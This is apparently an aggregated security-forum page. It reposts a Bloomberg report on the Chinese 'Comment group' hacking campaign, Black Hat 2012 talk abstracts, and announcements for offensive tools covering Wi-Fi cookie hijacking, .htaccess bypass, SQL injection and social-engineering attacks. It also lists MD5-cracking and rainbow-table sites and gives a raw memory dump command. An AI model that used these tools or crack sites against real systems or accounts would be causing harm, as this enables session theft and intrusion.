Milpitas, California-based FireEye Inc. alone has tracked hundreds of victims in the last three years and estimates the group has hacked more than 1,000 organizations, said Alex Lanstein, a senior security researcher. Stolen information is flowing out of the networks of law firms, investment banks, oil companies, drug makers, and high technology manufacturers in such significant quantities that intelligence officials now say it could cause long-term harm to U.S. and European economies. [h=2]’Earthquake Is Coming’[/h]“The activity we’re seeing now is the tremor, but the earthquake is coming,” said Ray Mislock, who before retiring in September was chief security officer for DuPont Co., which has been hacked by unidentified Chinese teams at least twice since 2009. “A successful company can’t sustain a long-term loss of knowledge that creates economic power,” he said. Even those offline aren’t safe. Y.C. Deveshwar, 65, a businessman who heads ITC, India’s largest maker of cigarettes, doesn’t use a computer. The Comment hackers last year still managed to steal a trove of his documents, navigating the conglomerate’s huge network to pinpoint the machine used by Deveshwar’s personal assistant. On July 5, 2011, the thieves accessed a list of documents that included Deveshwar’s family addresses, tax filings, and meeting minutes, as well as letters to fellow executives, such as London-based British American Tobacco Plc (BATS) chairman Richard Burrows and BAT chief executive, Nicandro Durante, according to the logs. They tried to open one entitled “YCD LETTERS” but couldn’t, so the hackers set up a program to steal a password the next time his assistant signed on. [h=2]Keeping Quiet[/h]When Bloomberg contacted the company in May, spokesman Nazeeb Arif said ITC was unaware of the breach, potentially giving the hackers unimpeded access to ITC’s network for more than a year. Deveshwar said in a statement that “no classified company related documents” were kept on the computer. Companies that discover their networks have been commandeered usually keep quiet, leaving the public, shareholders and clients unaware of the magnitude of the problem. Of the 10 Comment group victims reached by Bloomberg, those who learned of the hacks chose not to disclose them publicly, and three said they were unaware they’d been hacked until contacted for this story. This account of the Comment group is based on the researchers’ logs, as well as interviews with current and former intelligence officials, victims, and more than a dozen U.S. cybersecurity experts, many of whom track the group independently. [h=2]Private Investigators[/h]The researcher who provided the computer logs asked not to be named because of the sensitivity of the data, which included the name of victims. He was part of a collaborative drawn from 20 organizations that included people from private security companies, a university, internet service providers and companies that have been targeted, including a defense contractor and a pharmaceutical firm. The group included some of the top experts in the field, with experience investigating cyberspying against the U.S. government, major corporations and high profile political targets, including the Dalai Lama. Like similar, ad hoc teams formed temporarily to study hackers’ techniques, the group worked in secret because of the sensitivities of the investigation aimed at state-sponsored espionage. A smaller version of the group is continuing its research. As the surge in attacks on businesses and non-government groups over the last five years has pulled private security experts into the hacker hunt, they say they’re gradually catching up with U.S. counterintelligence agencies, which have been tackling the problem for a decade. [h=2]Espionage Tools[/h]One Comment group trademark involves hijacking unassuming public websites to send commands to victim computers, turning mom-and-pop sites into tools of foreign espionage, but also allowing the group to be monitored if those websites can be found, according to security experts. Sites it has commandeered include one for a teacher at a south Texas high school with the website motto “Computers Rock!” and another for a drag racing track outside Boise, Idaho. Adding a potentially important piece to the puzzle, researcher Joe Stewart, who works for Dell SecureWorks, an Atlanta-based security firm and division of Dell Inc. (DELL), the computer technology company, last year uncovered a flaw in software used by Comment group hackers. Designed to disguise the pilfered data’s ultimate destination, the mistake instead revealed that in hundreds of instances, data was sent to Internet Protocol (IP) addresses in Shanghai. Military Link? The location matched intelligence contained in the 2008 State Department cable published by WikiLeaks that placed the group in Shanghai and linked it to China’s military. Commercial researchers have yet to make that connection. The basis for that cable’s conclusion, which includes the U.S.’s own spying, remains classified, according to two former intelligence specialists. Lanstein said that although the make-up of the Comment group has changed over time -- the logs show some inexperienced hackers in the group making repeated mistakes, for example --the characteristics of a single group are unmistakable. The code and tools used by Comment aren’t public, and anyone using it would have to be given entre into the hackers’ ranks, he said. By October 2008, when the diplomatic cable published by WikiLeaks outlined the group’s activities, the Comment group had raided the networks of defense contractors and the Department of State, as well as made a specialty of hacking U.S. Army systems. The classified code names for China’s hacking teams were changed last year after that leak. Cybersecurity experts have connected the group to a series of headline-grabbing hacks, ranging from the 2008 presidential campaigns of Barack Obama and John McCain to the 72 victims documented last year by the Santa Clara, California-based security firm McAfee Inc., in what it called Operation Shady Rat. [h=2]Nuclear Break-In[/h]Others, not publicly attributed to the group before, include a campaign against North American natural gas producers that began in December 2011 and was detailed in an April alert by the Department of Homeland Security, two experts who analyzed the attack said. In another case, the hackers first stole a contact list for subscribers to a nuclear management newsletter, and then sent them forged e-mails laden with spyware. In that instance, the group succeeded in breaking into the computer network of at least one facility, Diablo Canyon nuclear plant, next to the Hosgri fault north of Santa Barbara, according to a person familiar with the case who asked not to be named. Last August, the plant’s incident management team saw an anonymous Internet post that had been making the rounds among cybersecurity professionals. It purported to identify web domains being used by a Chinese hacking group, including one that suggested a possible connection to Diablo plant operator Pacific Gas & Electric Co., according to an internal report obtained by Bloomberg News. [h=2]Partial Control[/h]It’s unclear how the information got to the Internet, but when the plant investigated, it found that the computer of a senior nuclear planner was at least partly under the control of the hackers, according to the report. The internal probe warned that the hackers were attempting “to identify the operations, organizations, and security of U.S. nuclear power generation facilities.” The investigators concluded that they had caught the breach early and there was “no solid indication” data was stolen, according to the report, though they also found evidence of several previous infections. Blair Jones, a spokesman for PG&E, declined to comment, citing plant security. Around the time the hackers were sending malware-laden e- mails to U.S. nuclear facilities, six people at the Wiley Rein law firm were ushered into hastily called meetings. In the room were an ethics compliance officer and a person from the firm’s information technology team, according to a person familiar with the investigation. The firm had been hacked, each of the six were told, and they were the targets. [h=2]Lawyers’ Files[/h]Among them were Alan Price and Timothy Brightbill. Firm partners and among the best known international trade lawyers in the country, they’ve handled a series of major anti-dumping and unfair trade cases against China. One of those, against China’s solar cell manufacturers, in May resulted in tariffs on more than $3 billion in Chinese exports, making it one of the largest anti-dumping cases in U.S. history. Dale Hausman, Wiley Rein’s general counsel, said he couldn’t comment on how the breach affected the firm or its clients. Wiley Rein has since strengthened its network security, Hausman said. “Given the nature of that practice, it’s almost a cost of doing business. It’s not a surprise,” he said. [h=2]E-Mails to Spouses[/h]Tipped off by the researchers, the firm called the Federal Bureau of Investigation, which dispatched a team of cyber investigators, the person familiar with the investigation said. Comment hackers had encrypted the data it stole, a trick designed to make it harder to determine what was taken. The FBI managed to decode it. The data included thousands of pages of e-mails and documents, from lawyers’ personal chatter with their spouses to confidential communications with clients. Printed out in a stack, the cache was taller than a set of encyclopedias, the person said. Researchers watching the hackers’ keystrokes last summer say they couldn’t see most of what was stolen, but it was clear that the spies had complete control over the firm’s e-mail system. The logs also hold a clue to how the FBI might have decrypted what was stolen. They show the simple password the hackers used to encrypt the files: 123!@#. Paul Bresson, a spokesman for the FBI in Washington, declined to comment. [h=2]Following the Crisis[/h]In case after case, the hackers’ trail crisscrossed with geopolitical events and global headlines. Last summer, as the news focused on Europe’s financial crisis, with its import for China’s rising economic power, the hackers followed. The timing coincided with an intense period for EU Council President Van Rompuy, set off by the failure July 11 of the EU finance ministers to agree on a second bailout package for Greece. Over the next 10 days, the slight and balding former Belgian prime minister presided over the negotiations, drawing European leaders, including German Chancellor Angela Merkel, to a consensus. Although the monitoring of Van Rompuy and his staff occurred during those talks, researchers say that the logs suggest a broad attack that wasn’t timed to a specific event. It was the cyber equivalent of a wiretap, they say -- an operation aimed at gathering vast amounts of intelligence over weeks, perhaps months. [h=2]’Big Implications’[/h]Richard Falkenrath, former deputy homeland security adviser to President George W. Bush, said China has succeeded in integrating decision-making about foreign economic and investment policy with intelligence collection. “That has big implications for the rest of the world when it deals with the country on those terms,” he said. Beginning July 8, 2011, the hackers’ access already established, they dipped into the council’s networks repeatedly over 10 days. The logs suggest an established routine, with the spies always checking in around 9 a.m. local time. They controlled the council’s exchange server, which gave them complete run of the e-mail system, the logs show. From there, the hackers simply opened the accounts of Van Rompuy and the others. [h=2]Week of E-Mails[/h]Moving from one victim to the next, the spies grabbed e- mails and attached documents, encrypted them in compression files and catalogued the reams of material by date. They grabbed a week’s worth of e-mails each time, appearing to follow a set protocol. Their other targets included then economic adviser and deputy head of cabinet, Odile Renaud-Basso, and the EU’s counter-terrorism coordinator. It’s unclear how long the hackers had been in the council’s network before the researchers’ monitoring began -- or how long it lasted after the end of July last year. There’s no indication the hackers penetrated the council’s offline system for secret documents. “Classified information and other sensitive internal information is handled on separate, dedicated networks,” the council press office said in a statement when asked about the hacks. The networks connected to the Internet, which handle e-mail, “are not designed for handling classified information.” What the EU did about the breach is unclear. Dirk De Backer, a spokesman for Van Rompuy, declined to comment on the incident, as did an official from the EU Council’s press office. A member of the EU’s security team joined the group of researchers in late July, and was provided information that would help identify the hackers’ trail, one of the researchers said. [h=2]“No Knowledge”[/h]Zoltan Martinusz, then principal adviser on external affairs and one of two victims reached by Bloomberg who would address the issue, said, “I have no knowledge of this.” The other official, who wasn’t authorized to discuss internal security and asked not to be identified, said he was informed last year that his e-mails had been accessed. The logs show how the hackers consistently applied the same, simple line of attack, the researchers said. Starting with a malware-laden e-mail, they moved rapidly through networks, grabbing encrypted passwords, cracking the coding offline, and then returning to mimic the organization’s own network administrators. The hackers were able to dip in and out of networks sometimes over months. The approach circumvented the millions of dollars the organizations collectively spent on protection. [h=2]Security Switched Off[/h]As the spies rifled the network of Business Executives for National Security Inc., a Washington-based nonprofit whose advisory council includes former Secretary of State Henry Kissinger and former Treasury Secretary Robert Rubin, the logs show them switching off the system’s Symantec anti-virus software. Henry Hinton Jr., the group’s chief operations officer, said in June he was unaware of the hack, confirming the user names of staff computers that the logs show were accessed, his among them. The records show the hackers’ mistakes, but also clever tricks. Using network administrator status, they consolidated onto a single machine the computer contents of the president and seven other staff members of the International Republican Institute, a nonprofit group promoting democracy. [h=2]220 Documents[/h]With all that data in one place, the hackers on June 29, 2011, selected 220 documents, including PDFs, spreadsheets, photos and the organization’s entire work plan for China. When they were done, the Comment group zipped up the documents into several encrypted files, making the data less noticeable as it left the network, the logs show. Lisa Gates, a spokeswoman for the IRI, confirmed that her organization was hacked but declined to comment on the impact on its programs in China because of concern for the safety of staff and people who work with the group. A funding document describes activities including supporting independent candidates in China, who frequently face harassment by China’s authorities. As a portrait of the hackers at work, the logs also show how nimbly they could respond to events, even when sensitive government networks were involved. The hackers accessed the network of the Immigration and Refugee Board of Canada July 18 last year, targeting the computer of Leeann King, an immigration adjudicator in Vancouver. King had made headlines less than a week earlier when she temporarily freed Chinese national Lai Changxing in the final days of a long extradition fight. Chinese authorities had been chasing Lai since he fled to Canada in 1999, alleging that he ran a smuggling ring that netted billions of dollars. [h=2]Cracking Court Accounts[/h]Monitoring by Cyber Squared Inc., an Arlington, Virginia- based company that tracks Comment independently and that captured some of the same activity as the researchers, recorded the hackers as they worked rapidly to break into King’s account. Beginning only with access to computers in Toronto, the hackers grabbed and decrypted user passwords, gaining access to IRB’s network in Vancouver and ultimately, the logs show, to King’s computer. From start to finish, the work took just under five hours. Melissa Anderson, a spokeswoman for the board, said officials had no comment on the incident other than to say that any such event would be fully investigated. Lai was eventually sent back to China on July 23, 2011 after losing a final appeal. He was arrested, tried, and in May of this year, a Chinese court sentenced him to life in prison. [h=2]Controlling the Networks[/h]In case after case, the hackers had the run of the networks they were rifling. It’s unclear how many of the organizations researchers contacted, but in only one of those cases was the victim already aware of the intrusion, according to one member of the group. Halliburton officials said they were aware of the intrusion and were working with the FBI, one of the researchers said. Marisol Espinosa, a spokeswoman for the publicly traded company, declined to comment on the incident. The trail last summer led to some unlikely spots, including Pietro’s, an Italian restaurant a couple of blocks from Grand Central station in New York. In business since 1932, guests to the dim, old-fashioned dining room can choose linguine with clam sauce (red or white) for $28. The Comment group stopped using the restaurant’s site to communicate with hacked networks sometime last year, said FireEye’s Lanstein, who discovered that the hackers had left footprints there. Traces are still there. [h=2]’Ugly Gorilla’[/h]Hidden in the webpage code of the restaurant’s site is a single command: ugs12, he said. It’s an order to a captive computer on some victim’s network to sleep for 12 minutes, then check back in, he explained. The ”ug” stands for “ugly gorilla,” what security experts believe is a moniker for a particularly brash member of Comment, a signal for anyone looking that the hackers were there, said Lanstein. “We’re so good even hackers want us!” joked Bill Bruckman, the restaurant’s co-owner, when he was told his website had been part of the global infrastructure of a Chinese hacking team. “Hey, put my name out there -- any business is good business,” he said. Bruckman said he knew nothing about the breach. A few friends reported trouble accessing the site about six months ago, though he said he’d never figured out what the problem was. Outside a moment later, smoking a cigarette, Bruckman added a more serious note. “Think of all that effort and information going down the drain. What a waste, you know what I mean?” Sursa: Hackers Linked to China’s Army Seen From EU to D.C. - Bloomberg

Blackhat 2012 Europe - Gdi Font Fuzzing In Windows Kernel For Fun Description: Blackhat 2012 EUROPE - GDI Font Fuzzing in Windows Kernel For Fun https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Slides.pdf https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Tool.zip There are different types of font available within Windows and two groups of categories exist: GDI fonts and Device fonts. This talk will cover the GDI TrueType & GDI Bitmap fonts only on Windows platform. In GDI, one typically to create font is filling in a LOGFONT Structure and then calling CreateFontIndirect which returns a font handle. As expect from the name, a LOGFONT structure is a logical font, if the user draw some text using that font handle, GDI will look for a matching physical font to draw the text. If it doesn't find any match font name, it will use some other font. The resulting outcome is that the font fuzzer is working at the lower level through physical font API's provided by the GDI itself. For instance, API functions GetFontData, GetGlyphIndices and even ExtTextOut when used with the ETO_GLYPH_INDEX flag. Font fuzzer in this talk is aim to trigger the font vulnerabilities published in internet, two vulnerability in Windows Kernel MS11-077 and MS11-087 in handling crafted font will be discussed in this talk. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Blackhat 2012 Europe - Gdi Font Fuzzing In Windows Kernel For Fun

Blackhat 2012 Europe - One-Byte Modification For Breaking Memory Forensic Analysis Description: https://media.blackhat.com/bh-eu-12/Haruyama/bh-eu-12-Haruyama-Memory_Forensic-Slides.pdf Memory forensics is an effective technique to detect malwares quickly or extract sensitive user data from RAM. Memory forensics is separated into two parts: memory acquisition and analysis. So far, some anti-acquisition methods were proposed and demonstrated, but there was no sufficient discussion about anti-analysis ones. This presentation introduces anti-analysis methods based on unconsidered assumptions of the existing analysis tools. By using the methods, attackers can abort memory analysis and make the result empty. Since it's difficult for forensic analysts to figure out the cause from error messages, they must think acquired memory images are simply corrupted. Specifically, anti-analysis methods focus attention on three operations performed in memory analysis. All major analysis tools take several rapid approaches in these operations. If attackers want to make the analysis tools fail with the smallest modification, all they have to do is to modify only one byte of the data structure related to one approach. Of course, the modification has no impact on the running system. The presentation is made up as follows. First, I show an overview about memory acquisition and analysis such as memory image formats, evaluation of acquisition tools, memory analyzing methods, comparison of analysis tools, and so on. Next, I point out issues of each analysis tool and key structures referred to by it, then I demonstrate all analysis tools fail by modifying data in the structures. Finally, I suggest desired usages for forensic analysts and improvement plans for developers to decrease the risk of anti-analysis methods. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Blackhat 2012 Europe - One-Byte Modification For Breaking Memory Forensic Analysis

Blackhat 2012 Europe - Hdmi - Hacking Displays Made Interesting Description: https://media.blackhat.com/bh-eu-12/Davis/bh-eu-12-Davis-HDMI-WP.pdf https://media.blackhat.com/bh-eu-12/Davis/bh-eu-12-Davis-HDMI-Slides.pdf Picture this scene, which happens thousands of times every day all around the world: Someone walks into a meeting room, sees a video cable and plugs it into their laptop. The other end of the cable is out of sight . it just disappears through a hole in the table. What is it connected to? Presumably the video projector bolted to the ceiling, but can it be trusted to just display their PowerPoint presentation?... This presentation discusses the security of video drivers which interpret and process data supplied to them by external displays, projectors and KVM switches. It covers all the main video standards, including VGA, DVI, HDMI and DisplayPort. It also details the construction of a hardware-based EDID fuzzer using an Arduino Microcontroller and a discussion of some of its findings. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Blackhat 2012 Europe - Hdmi - Hacking Displays Made Interesting

Arata foarte bine. Sunt materialele de la masterul de Securitate Informatica de la ASE? Ai facut masterul acolo, poti da mai multe detalii? As fi si eu interesat sa fac acel master, de aceea intreb.

cat /dev/mem > ~/dump.bin Bine, de la 2.6 am citit ca nu mai merge chiar brut, e restrictionat.

[h=3]Fern Wifi Cracker 1.45 Released with Cookie Hijacker[/h] Fern Cookie Hijacker is a new feature add in Fern Wifi Cracker 1.45 ,it is a wifi based session hijacking tool able to clone remote online web sessions by sniffing and capturing wireless cookie packets from remote hosts by intercepting reachable wireless signals. It is capable of decrypting WEP encrypted packets on the fly to process session cookies transmitted over the air. Fern cookie Hijacker comes with smart intergrated code to detect and intercept cookie packets, unlike some cookie detection engines fern cookie hijacker does not wait to collect complete cookie acknowledgement during the initial authentication process, but pulls cookies and associate them with their hosts as they are transmitted over the wireless connection, its also forges to correctness values that are not captured e.g (exipry,isSecure). Download Fern Wifi Cracker 1.45 Sursa: Fern Wifi Cracker 1.45 Released with Cookie Hijacker | Tools Yard - The Hacker News

HTExploit : Open Source Tool to Bypass Standard Directory Protection HTExploit (HiperText access Exploit) is an open-source tool written in Python that exploits a weakness in the way that .htaccess files can be configured to protect a web directory with an authentication process to gain access to a protected directory contents. Presumably, if such an attack is successful, you can launch further attacks such as SQL Injection, Local File Inclusion, Remote File Inclusion, etc. on discovered files. Features of HTExploit: Multiples modules to execute. Save the output to an specify directory. HTML Reporting. Use multiples wordlist to probe against htaccess bypassing. Mode verbose for a full detailed information. Multi-platform and flexible. The vulnerability exists because web servers like Apache forward PHP-based requests within .htaccess to the PHP engine itself. The .htaccess file allows you to specify the requests get sent to PHP to try to interpret. However, on encountering non-standard input, PHP automatically treats it as a GET request, and allows the utility to start saving the PHP files on a webserver to your local filesystem, bypassing security restrictions! Download HTExploit Sursa: HTExploit : Open Source Tool to Bypass Standard Directory Protection | Tools Yard - The Hacker News

[h=3]jSQL : Java GUI for database Injection[/h]An easy to use SQL injection tool for retrieving database informations from a distant server. jSQL Injection features: GET, POST, header, cookie methods visual, errorbase, blind algorithms automatic best algorithms detection data retrieving progression proxy setting Download jSQL Sursa: jSQL : Java GUI for database Injection | Tools Yard - The Hacker News

--help

Biggest MD5 crack databases By Langy ----------------------------------------------------------------- MOST BIGGEST SITE OF MD5 DECRYPING ----------------------------------------------------------------- - Free Hash Cracker Online - MD5 Encrypt - MD5 Decrypt (40,000,000) - online md5 cracker,md5 reverse, md5 decrypt (457,354,352,282) - md5Crack.com | online md5 cracker - http://www.hashchecker.com - http://md5cracker.tk/ (MD5 Search engine by searches a total of 14 on-line crackers.) - MD5 Decrypter.com, MD5 Decryption, Free MD5 Decrypter (5,889,729) - md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com (56,502,235) - http://www.tmto.org/?category=main&page=search_md5 (306.000.000.000) - http://www.milw0rm.com/cracker/insert.php (Milw0rm Cracker db) - http://blacklight.gotdns.org/cracker/crack.php (2,456,288) - http://www.shell-storm.org/md5 ( The data base currently contains 169582 passwords ) - Parallels Confixx (Need Account) - http://passcracking.com/ (Register to increase your priority) - http://www.xmd5.org - Perl Script: MD5 Brute Forcer ----------------------------------------------------------------- CRACKED PASSWORD LIST ----------------------------------------------------------------- http://www.md5oogle.com/md5hashes.php http://www.hashchecker.com/?_sls=hash_list&_from=1 http://www.milw0rm.com/cracker/list.php http://darkc0de.com/database/cracked.txt ----------------------------------------------------------------- RAINBOW TABLE ----------------------------------------------------------------- http://www.freerainbowtables.com/en/download/ http://www.rainbowtables.net/ +++++++++++++++++++++++++++++++++++++++++++++++++++ http://gdataonline.com/seekhash.php http://passcracking.com/ http://www.1hacker.com/md5/index.php http://www.gdataonline.com/seekhash.php http://www.rc.plain-text.info/ http://www.milw0rm.com/md5/index.php http://www.cracking.com/Good_values_list.asp http://www.passcracking.com/Good_values_list.asp http://www.hashchecker.com/index.php?_sls=info http://www.uploadpage.net/ap/php/pro...rt/addhash.php http://www.cmho.tk/ http://www.md5.rednoize.com/ http://www.us.md5.crysm.net/ http://www.milw0rm.com http://www.passcracking.com/ http://www.hashchecker.com/ http://www.plain-text.info http://www.md5.rednoize.com http://www.ice.breaker.free.fr http://www.md5.shalla.de http://www.nz.md5.crysm.net http://www.shm.hard-core.pl/md5/ http://www.lasecwww.epfl.ch/%7Eoechs...ects/ophcrack/ http://www.md5.benramsey.com Sursa: http://www.googlebig.com/forum/biggest-md5-crack-databases-t-68.html

Decat sa posteze mult si prost, e de preferat sa nu posteze deloc.

V-am pus buton de "Activity" pe tema RST. Daca e vreo problema postati aici.

BBQSQL : Blind SQL injection framework ( Python ) Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don’t you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues. BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast. Must provide the usual information: URL HTTP Method Headers Cookies Encoding methods Redirect behavior Files HTTP Auth Proxies After you pull the tool from Github, you can install simply by typing: python setup.py install Download BBQSQL Sursa: BBQSQL : Blind SQL injection framework ( Python ) | Tools Yard - The Hacker News

The Social-Engineer Toolkit (SET) v3.5.1 released The Social-Engineer Toolkit (SET) v3.5.1 has been released. This version adds the ability to us ethe SET config to not deploy binaries to the victim machine through the Java Applet. The new configuration option can be found under config/set_config and DEPLOY_BINARIES. The Social Engineering Toolkit (SET) is an open source, python-driven, social-engineering penetration testing framework of custom tools which solely focuses on attacking the human element of penetration testing. It was designed in order to arm penetration testers and security researchers with the ability to effectively test heavily advanced social-engineering attacks armed with logical methods. The Social Engineer Toolkit leverages multiple attack vectors that take advantage of the human element of security in an effort to target attackers. By turning this off, SET will rely solely on the POWERSHELL_INJECTION technique for compromising the victim machine. This means that you have the ability to never touch disk period during the Java Applet attack. Full changelog below: Fixed a bug in command center that would cause it to not load properly. Fixed a bug in the new Java Applet Field Bytecode that would cause it to not properly select the payload Added compatibility for IE10 on the Java Applet Attack Vector Turned AUTO_MIGRATE=OFF to AUTO_MIGRATE=ON by default, allows sticky processes to free up when exploitation occurs Added a new config option DEPLOY_BINARIES. When this is turned OFF, the Java Applet will only use the POWERSHELL_INJECTION technique and never deploy a binary. Note that you must know if the victim has POWERSHELL installed. Fixed a couple typos in the credential harvester. In addition, AUTO_MIGRATE=ON has been turned on by default and will automatically migrate to a different thread/process. In IE10, IE would freeze periodically causing issues. Even though JVM is running in a separate thread pool, it would still cause freezing intermittently. The SET Command Center (web interface) had a bug fix to allow it to work properly. Download Social Engineer Toolkit 3.5.1 svn co / - Revision 1467: /social_engineering_toolkit set/ Sursa: The Social-Engineer Toolkit (SET) v3.5.1 released | Tools Yard - The Hacker News

The OWASP O2 Platform v 4.1 Released The OWASP O2 Platform is an OWASP Project which is a collection of Open Source modules that help Web Application Security Professionals to maximize their efforts and quickly obtain high visibility into an application's security profile. The objective is to 'Automate Application Security Knowledge and Workflows" Read More here Download The OWASP O2 Platform v 4.1 Sursa: The OWASP O2 Platform v 4.1 Released | Tools Yard - The Hacker News

Freenet 0.7.5 build 1409 released Freenet is free software which lets you publish and obtain information on the Internet without fear of censorship. To achieve this freedom, the network is entirely decentralized and publishers and consumers of information are anonymous. Without anonymity there can never be true freedom of speech, and without decentralization the network would be vulnerable to attack. Download Freenet 0.7.5 build 1409 Sursa: Freenet 0.7.5 build 1409 released | Tools Yard - The Hacker News

Network Tracking Database v1.10.2 released NetDB tracks all MAC addresses on your switches and ARP entries on your network over time. It supports extensive switch, VLAN and vendor code reports from a CLI or Web App. Can generate CSV reports, track the usage of static addresses and much more. What's new in v1.10.2: - See the UPGRADE document before installing - Added dedicated NX-OS scraper, devtype nxos. Improved NX-OS support for descriptions. Old scraper still supports NX-OS but support will be dropped in v1.11 in favor of the nxosscraper. - Ability to configure use_trunks from the devicelist.csv file - Improved secondary credential support and login error messages - Added use_fqdn knob in netdb.conf to use the FQDN for switch names instead of just hostnames (changing this on an existing database will destroy historical data on switches because the names will all change) Major Features: Track all entries in your MAC and ARP tables across your network routers and switches over time Track the usage of static IP addresses and generate reports for static address recovery Generate switch reports to recover unused ports or plan for network upgrades Find all switchports configured for a vlan and find what devices if any have been connected Find all devices on a VLAN and the last time they were online Quickly track down a problem with a device and locate its current state on the network or last connected state Includes a command line tool and an easy to use web interface with access control Web interface includes sortable columns and access controls Generate CSV reports from the web interface or the command line Change VLANs from the web interface with access controls on a per switch or per user basis Send Wake On Lan packets from the Web Interface to remotely wakeup workstations Fast imports, pulls data from 1,000 or more network devices in under five minutes (depends on the hardware used) Support for VRFs and almost every modern Cisco IOS and NX-OS device Support for port security, port-channels and trunk ports for VMWare and phones Optional graphing through MRTG to track the usage trends on your network Optionally integrate NAC registration data to retrieve user registration information based on the mac address Security Runs everything as the netdb user Uses and/or SSH/Telnet to gather information from your devices and does not require write access Does not use SNMP, so no security issues or MIBs to deal with Web Interface has access controls to restrict the information users can access based on their userid Web Interface is hardened Download Network Tracking Database v1.10.2 Sursa: Network Tracking Database v1.10.2 released | Tools Yard - The Hacker News

Ostinato : Packet/Traffic Generator and Analyzer Ostinato is an open-source, cross-platform network packet crafter/traffic generator and analyzer with a friendly GUI. Craft and send packets of several streams with different protocols at different rates. Windows, Linux, BSD and Mac OS X (Will probably run on other platforms also with little or no modification but this hasn't been tested) Open, edit, replay and save PCAP files Support for the most common standard protocols Ethernet/802.3/LLC SNAP VLAN (with QinQ) ARP, IPv4, IPv6, IP-in-IP a.k.a IP Tunnelling (6over4, 4over6, 4over4, 6over6) TCP, UDP, ICMPv4, ICMPv6, IGMP, MLD Any text based protocol (HTTP, SIP, RTSP, NNTP etc.) More protocols in the works ... Modify any field of any protocol (some protocols allow changing packet fields with every packet at run time e.g. changing IP/MAC addresses) User provided Hex Dump - specify some or all bytes in a packet User defined script to substitute for an unimplemented protocol (EXPERIMENTAL) Stack protocols in any arbitrary order Create and configure multiple streams Configure stream rates, bursts, no. of packets Single client can control and configure multiple ports on multiple computers generating traffic Exclusive control of a port to prevent the OS from sending stray packets provides a controlled testing environment Statistics Window shows realtime port receive/transmit statistics and rates Capture packets and view them (needs Wireshark to view the captured packets) Framework to add new protocol builders easily Demo Download Ostinato Sursa: Ostinato : Packet/Traffic Generator and Analyzer | Tools Yard - The Hacker News